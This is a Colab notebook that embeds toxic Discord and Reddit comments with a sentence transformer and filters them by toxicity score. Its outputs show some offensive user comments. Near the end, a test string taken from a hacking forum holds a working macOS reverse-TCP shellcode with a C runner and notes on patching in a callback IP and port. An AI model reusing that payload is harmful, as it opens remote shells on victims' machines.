In [1]:
from google.colab import drive
drive.mount('/content/drive')

Mounted at /content/drive


In [1]:
#!/usr/bin/env python
# coding: utf-8
# !pip3 install jsonlines
!pip3 install ipython-autotime
!pip3 install pickle5
# !pip3 install --upgrade nltk
%load_ext autotime
# import nltk
# nltk.download('punkt')
# nltk.download('wordnet')
# nltk.download('omw-1.4')
# nltk.download('brown')
# nltk.download('averaged_perceptron_tagger')
# nltk.download('vader_lexicon')
# !pip3 install --upgrade requests
!pip3 install sentence_transformers
# !pip3 install tensorflow_hub
# !pip3 install umap-learn
# !pip3 install tweepy

import pandas as pd
import numpy as np
import pickle5 as pickle
import re
from nltk.stem import WordNetLemmatizer
import nltk
from tqdm.notebook import tqdm
tqdm.pandas()
import requests

from termcolor import colored
import os
os.environ["TOKENIZERS_PARALLELISM"] = "false"

nb_workers=10

import os
from datetime import datetime
# import pickle
import ast
import re

from sentence_transformers import SentenceTransformer

lemmatizer = WordNetLemmatizer()
# punctuations = """!"$%()*+,*/:#»«'";“<=>?[\]^`”{.}~"""
punctuations = """!"$%()*+,*/:»«";“<=>?[\]^`”|{.}~"""
def clean_text_local(row):
    row=re.sub('\x0c',' ',row)
    row=re.sub('\u200c',' ',row)
    # row=re.sub('\n\n',' . ',row)
    # row=re.sub('\\n',' ',row)

    row=re.sub('\\\\n',' ',row)
    row=re.sub('\n',' ',row)
    
    row=re.sub("-?NEWLINE_TOKEN", " ",row)
    row=re.sub("TAB_TOKEN", " ",row)
    row=re.sub("Alternate option=", "",row)
    row=re.sub('RT',' ',row)
    row = row.lower()
    
    row=re.sub("@[A-Za-z0-9_]+","",row)
    row=re.sub("http\S+|www.\S+","",row)

    row = re.sub(r'<.*?>', ' ', row)
    row = re.sub('\w*\d\w*','',row)
    row=re.sub("&amp","&",row)
#     row=re.sub("\d","",row)
#     row=re.sub(r"\b\d+\b|\b(?![i])[a-z]\b","",row) # removes every isolated number or char except i
    # row = ' '.join([lemmatizer.lemmatize(w) for w in nltk.word_tokenize(row)])
    row=re.sub('-',' ',row)
    # no_punct = ""
    # for char in row:
    #     if char not in punctuations:
    #         no_punct = no_punct + char
    row = row.strip()
    row = re.sub('\s+',' ',row)
    return row
    # return row

# load intents dataset
# data_sample = pd.read_csv('../data/processed/data_sample.csv')


# define the document embedding models to use for comparison
# module_url = "https://tfhub.dev/google/universal-sentence-encoder/4"
# model_use = hub.load(module_url)
# print('loaded USE', flush=True)
model_st1 = SentenceTransformer('all-mpnet-base-v2')
print('loaded all-mpnet-base-v2', flush=True)
# model_st2 = SentenceTransformer('all-MiniLM-L6-v2')
# print('loaded all-MiniLM-L6-v2', flush=True)
# model_st3 = SentenceTransformer('paraphrase-mpnet-base-v2')
# print('loaded paraphrase-mpnet-base-v2', flush=True)

def embed(model, model_type, sentences):
    """
    wrapper function for generating message embeddings
    """
    if model_type == 'use':
        embeddings = model(list(sentences))
    elif model_type == 'sentence transformer':
        embeddings = model.encode(list(sentences),show_progress_bar=True)

    return embeddings

def split_embed(model_, model_type_, all_sentences_, n_partitions_=20):
    all_sentences_ = np.array_split(all_sentences_, indices_or_sections = n_partitions_)
    for i, new_sentences in enumerate(all_sentences_):
        if i==0:
            # print(colored('\nbeginning section {}'.format(i+1),'yellow'),flush=True)
            all_embeddings = embed(model_, model_type_, new_sentences)
        if i>0:
            # print(colored('\nbeginning section {}'.format(i+1),'yellow'),flush=True)
            new_embeddings = embed(model_, model_type_, new_sentences)
            all_embeddings = np.concatenate((all_embeddings,new_embeddings),axis=0)
    return all_embeddings

def vector_to_column(df,vectors,column_name):
    df[column_name]=0
    df[column_name]=df[column_name].astype(object)
    df.reset_index(drop=True,inplace=True)
    indices=df.index
    for i in indices:
        df.at[i, column_name]=vectors[i]
    return df


Looking in indexes: https://pypi.org/simple, https://us-python.pkg.dev/colab-wheels/public/simple/
     |████████████████████████████████| 1.6 MB 5.1 MB/s 
Looking in indexes: https://pypi.org/simple, https://us-python.pkg.dev/colab-wheels/public/simple/
     |████████████████████████████████| 256 kB 3.4 MB/s 
Looking in indexes: https://pypi.org/simple, https://us-python.pkg.dev/colab-wheels/public/simple/
     |████████████████████████████████| 85 kB 1.4 MB/s 
     |████████████████████████████████| 5.5 MB 9.8 MB/s 
     |████████████████████████████████| 1.3 MB 26.7 MB/s 
     |████████████████████████████████| 182 kB 17.0 MB/s 
     |████████████████████████████████| 7.6 MB 46.4 MB/s 
  Created wheel for sentence-transformers: filename=sentence_transformers-2.2.2-py3-none-any.whl size=125938 sha256=4f4077ef89fc2a888bf7a7433ca2ce421e46d195935247f03e7de405037fd6bf
  Stored in directory: /root/.cache/pip/wheels/bf/06/fb/d59c1e5bd1dac7f6cf61ec0036cc3a10ab8fecaa6b2c3d3ee9
Successfully b

Downloading:   0%|          | 0.00/1.18k [00:00<?, ?B/s]

Downloading:   0%|          | 0.00/190 [00:00<?, ?B/s]

Downloading:   0%|          | 0.00/10.6k [00:00<?, ?B/s]

Downloading:   0%|          | 0.00/571 [00:00<?, ?B/s]

...

Downloading:   0%|          | 0.00/363 [00:00<?, ?B/s]

Downloading:   0%|          | 0.00/13.1k [00:00<?, ?B/s]

Downloading:   0%|          | 0.00/232k [00:00<?, ?B/s]

Downloading:   0%|          | 0.00/349 [00:00<?, ?B/s]

loaded all-mpnet-base-v2
time: 32.9 s (started: 2022-11-29 16:32:14 +00:00)


In [2]:
from transformers import BertTokenizer, BertForPreTraining
import torch

tokenizer = BertTokenizer.from_pretrained('dccuchile/bert-base-spanish-wwm-uncased')
model = BertForPreTraining.from_pretrained('dccuchile/bert-base-spanish-wwm-uncased')

Downloading:   0%|          | 0.00/248k [00:00<?, ?B/s]

Downloading:   0%|          | 0.00/134 [00:00<?, ?B/s]

Downloading:   0%|          | 0.00/310 [00:00<?, ?B/s]

Downloading:   0%|          | 0.00/650 [00:00<?, ?B/s]

Downloading:   0%|          | 0.00/440M [00:00<?, ?B/s]

Some weights of BertForPreTraining were not initialized from the model checkpoint at dccuchile/bert-base-spanish-wwm-uncased and are newly initialized: ['bert.pooler.dense.bias', 'bert.pooler.dense.weight', 'cls.seq_relationship.bias', 'cls.seq_relationship.weight']
You should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.


time: 21 s (started: 2022-11-29 16:32:52 +00:00)


In [9]:
import os
discords = os.listdir('/content/drive/MyDrive/Discord-Reddit/Datasets/discord')
subreddits = os.listdir('/content/drive/MyDrive/Discord-Reddit/Datasets/reddit')

# discords.remove('.ipynb_checkpoints')
# subreddits.remove('.ipynb_checkpoints')

time: 9.53 ms (started: 2022-11-29 11:55:23 +00:00)


In [10]:
discords

['kpop_discord_hate.csv',
 'sports_discord_hate.csv',
 'nosleep_discord_hate.csv',
 'Games_discord_hate.csv',
 'Jokes_discord_hate.csv',
 'history_discord_hate.csv',
 'europe_discord_hate.csv',
 'music_discord_hate.csv',
 'ksi_discord_hate.csv',
 'rickandmorty_discord_hate.csv',
 'Rainbow6_discord_hate.csv',
 'dankmemes_discord_hate.csv',
 'Overwatch_discord_hate.csv',
 'Writingprompts_discord_hate.csv',
 'Ukrainian_discord_hate.csv']

time: 3.95 ms (started: 2022-11-29 11:55:28 +00:00)


In [5]:
my_dir = '/content/drive/MyDrive/Discord-Reddit/Datasets/'
data=pd.read_csv(f'{my_dir}reddit/nosleep_subreddit_hate.csv',lineterminator='\n')
data

,Unnamed: 0,comment_text,author,timestamp,hate,comment_text_cleaned,Toxic_BERT
0,0,Hi there! [Your post](https://redd.it/wgtmxg) ...,NoSleepAutoBot,2022-08-05 12:07:57,0,hi there! [your post]( has been **temporarily*...,0.000919
1,1,I didn't pay attention to what subreddit this ...,sjik123,2022-08-05 11:57:52,0,i didn't pay attention to what subreddit this ...,0.000902
2,2,Bro,lordfeudal,2022-08-05 11:54:08,0,bro,0.008453
3,3,Thanks for that. I’m curious for the context now,W-eye,2022-08-05 11:53:37,0,thanks for that. i’m curious for the context now,0.000540
4,4,Your submission has been removed. Stories in /...,AutoModerator,2022-08-05 11:35:16,0,your submission has been removed. stories in /...,0.000579
...,...,...,...,...,...,...,...
100090,100090,Your submission has been removed. Stories in /...,AutoModerator,2022-01-02 17:01:56,0,your submission has been removed. stories in /...,0.000579
100091,100091,You make me ashamed to be British,MyEyesDontBreathe,2022-01-02 16:49:49,1,you make me ashamed to be british,0.061733
100092,100092,Which God did you met?\nThere’s something like...,Faelysis,2022-01-02 16:43:57,1,which god did you met? there’s something like ...,0.077283
100093,100093,I'M SORRY WHAT LADY IN THE WINDOWS,amahag29,2022-01-02 16:39:35,1,i'm sorry what lady in the windows,0.001704


time: 2.45 s (started: 2022-11-29 11:48:26 +00:00)


In [ ]:
data=data[data['author_id']!='error']
data=data[data['hate']==1]
data

,Unnamed: 0,content,author_id,author_username,timestamp,hate
0,0,crap that doesnt make me feel any better,773565560079646752,!george got drip!,2022-08-03T05:12:13.243000+00:00,1
1,1,You're gonna run a *lot*,566409746597412864,RealThatCatStabe360,2022-08-03T05:11:57.164000+00:00,1
3,3,Oh hell nah,566409746597412864,RealThatCatStabe360,2022-08-03T05:11:35.673000+00:00,1
16,16,then u a nub,896654977886482432,Leny,2022-08-03T05:09:02.644000+00:00,1
29,29,Fogg,998277628479938680,Protistapox,2022-08-03T04:59:41.804000+00:00,1
...,...,...,...,...,...,...
497960,497960,<a:sussywatch:860900403419807754>,360424724137902080,Shiori,2021-12-29T18:31:45.585000+00:00,1
497961,497961,Had a shitty background bathroom wall so made ...,456226577798135808,Deleted User,2021-12-29T18:31:42.329000+00:00,1
497963,497963,she is a cuwwiepie,248443129282297856,kamikaze,2021-12-29T18:31:37.652000+00:00,1
497964,497964,rules?\nyou broke the laws of the sussy republ...,585174959609872385,mando,2021-12-29T18:31:34.273000+00:00,1


time: 30.6 ms (started: 2022-10-20 11:02:03 +00:00)


In [12]:
# platform = 'reddit'
platform = 'discord'

if platform == 'reddit':
  text_col = 'comment_text'
  author_col = 'author'
  platform_files = subreddits


if platform == 'discord':
  text_col = 'content'
  author_col = 'author_username'
  platform_files = discords

for file_name in platform_files:

  print(f'\n\nbegining with {file_name}')

  my_dir = '/content/drive/MyDrive/Discord-Reddit/Datasets/'
  data=pd.read_csv(f'{my_dir}{platform}/{file_name}',lineterminator='\n')
  print(f'{file_name} has {len(data)} data')
  data[text_col]=data[text_col].astype(str)
  data=data[data[text_col].map(len) > 2]
  data=data[data[author_col]!='error']
  data=data[data[author_col]!=0]
  data=data[data [author_col]!='AutoModerator']
  data.drop_duplicates(subset=text_col, keep='first', inplace=True, ignore_index=False)
# reddit_x[reddit_x['comment_text'].duplicated()]
  data=data[data['Toxic_BERT']>0.5]
  print(f'{len(data)} of them are toxic')
  if len(data)>10000:
    data=data.sample(10000,random_state=1)
  else:
    print(f'not enough data to sample 10000')
  data[text_col]=data[text_col].progress_apply(lambda x: clean_text_local(str(x)))

  embeddings_st1 = np.asarray(split_embed(model_st1, 'sentence transformer', data[text_col], n_partitions_=1))

  data = vector_to_column(df=data,vectors=embeddings_st1,column_name='all-mpnet-base-v2')

  pickle.HIGHEST_PROTOCOL = 4
  file_name_ = file_name.split('.')[0]
  data.to_hdf(f'/content/drive/MyDrive/Discord-Reddit/Datasets/vectorized_data/{file_name_}.hdf','df')



begining with kpop_discord_hate.csv
kpop_discord_hate.csv has 431128 data
18896 of them are toxic


  0%|          | 0/10000 [00:00<?, ?it/s]

Batches:   0%|          | 0/313 [00:00<?, ?it/s]



begining with sports_discord_hate.csv
sports_discord_hate.csv has 10321 data
522 of them are toxic
not enough data to sample 10000


/usr/local/lib/python3.7/dist-packages/pandas/core/generic.py:2718: PerformanceWarning: 
your performance may suffer as PyTables will pickle object types that it cannot
map directly to c-types [inferred_type->mixed,key->block2_values] [items->Index(['content', 'author_username', 'timestamp', 'content_cleaned',
       'all-mpnet-base-v2'],
      dtype='object')]

  encoding=encoding,


...

Batches:   0%|          | 0/188 [00:00<?, ?it/s]



begining with Ukrainian_discord_hate.csv
Ukrainian_discord_hate.csv has 319102 data
19443 of them are toxic


  0%|          | 0/10000 [00:00<?, ?it/s]

Batches:   0%|          | 0/313 [00:00<?, ?it/s]

time: 3min 6s (started: 2022-11-29 12:05:50 +00:00)


In [ ]:
pd.read_csv(f'{my_dir}reddit/europe_subreddit_hate.csv',lineterminator='\n')

NameError: ignored

In [ ]:
text =  '  test* pixe1 said: один из немногих работающих бэк-коннект шелкодов под macosx 10. х86/64 \nпод шел rat подогнать думаю будет несложно.  \n  \n \n***CODE***\n#include <sys/mman.h>\n#include <inttypes.h>\n#include <unistd.h>\n\n\n/#osx reverse tcp shell (131 bytes)\n;#replace ffffffff around byte 43 with the call back ip in hex\n;#replace 5c11 around byte 39 with a new port current is 4444\n/\n\nchar code[] =\n"\\x41\\xb0\\x02\\x49\\xc1\\xe0\\x18\\x49\\x83\\xc8\\x61\\x4c\\x89\\xc0\\x48" \n"\\x31\\xd2\\x48\\x89\\xd6\\x48\\xff\\xc6\\x48\\x89\\xf7\\x48\\xff\\xc7\\x0f" \n"\\x05\\x49\\x89\\xc4\\x49\\xbd\\x01\\x01\\x11\\x5c\\xff\\xff\\xff\\xff\\x41" \n"\\xb1\\xff\\x4d\\x29\\xcd\\x41\\x55\\x49\\x89\\xe5\\x49\\xff\\xc0\\x4c\\x89"\n"\\xc0\\x4c\\x89\\xe7\\x4c\\x89\\xee\\x48\\x83\\xc2\\x10\\x0f\\x05\\x49\\x83"\n"\\xe8\\x08\\x48\\x31\\xf6\\x4c\\x89\\xc0\\x4c\\x89\\xe7\\x0f\\x05\\x48\\x83"\n"\\xfe\\x02\\x48\\xff\\xc6\\x76\\xef\\x49\\x83\\xe8\\x1f\\x4c\\x89\\xc0\\x48"\n"\\x31\\xd2\\x49\\xbd\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x49\\xc1\\xed"\n"\\x08\\x41\\x55\\x48\\x89\\xe7\\x48\\x31\\xf6\\x0f\\x05"\n\n\nint main()\n{\n\xa0 \xa0int (ret)() = (int ()())code;\n\xa0 \xa0void page = (void )((uintptr_t)code & ~(getpagesize() - 1));\n\n\xa0 \xa0mprotect(page, sizeof code, prot_exec);\n\n\xa0 \xa0ret();\n\n\xa0 \xa0return 0;\n} \n***CODE***\n  \n \n \nспасибо!:) в чем его можно скомпилить? не кодил под osx....  \n \n \n  \n  \ngcc на маке ...'
# text = "test test test test***CODE*** jfdaklheöhkhölk ***CODE*** fjaklöjk"

text=re.sub("\*\*\*CODE\*\*\*.*\*\*\*CODE\*\*\*", "", text, flags=re.DOTALL) #because crawler generates IMAGES that way
text=re.sub("\*\*\*IMG\*\*\*[^()]*\*\*\*IMG\*\*\*", "", text, flags=re.DOTALL) #because crawler generates IMAGES that way
text=re.sub("\*\*\*LINK\*\*\*[^()]*\*\*\*LINK\*\*\*", "", text, flags=re.DOTALL) #because crawler generates link that way
text=re.sub("\*\*\*CITINGMISSEDPOST\*\*\*", "", text, flags=re.DOTALL)




time: 3.03 ms (started: 2022-11-28 17:11:09 +00:00)


In [ ]:
text

'  test* pixe1 said: один из немногих работающих бэк-коннект шелкодов под macosx 10. х86/64 \nпод шел rat подогнать думаю будет несложно.  \n  \n \n\n  \n \n \nспасибо!:) в чем его можно скомпилить? не кодил под osx....  \n \n \n  \n  \ngcc на маке ...'

time: 3.22 ms (started: 2022-11-28 17:11:11 +00:00)
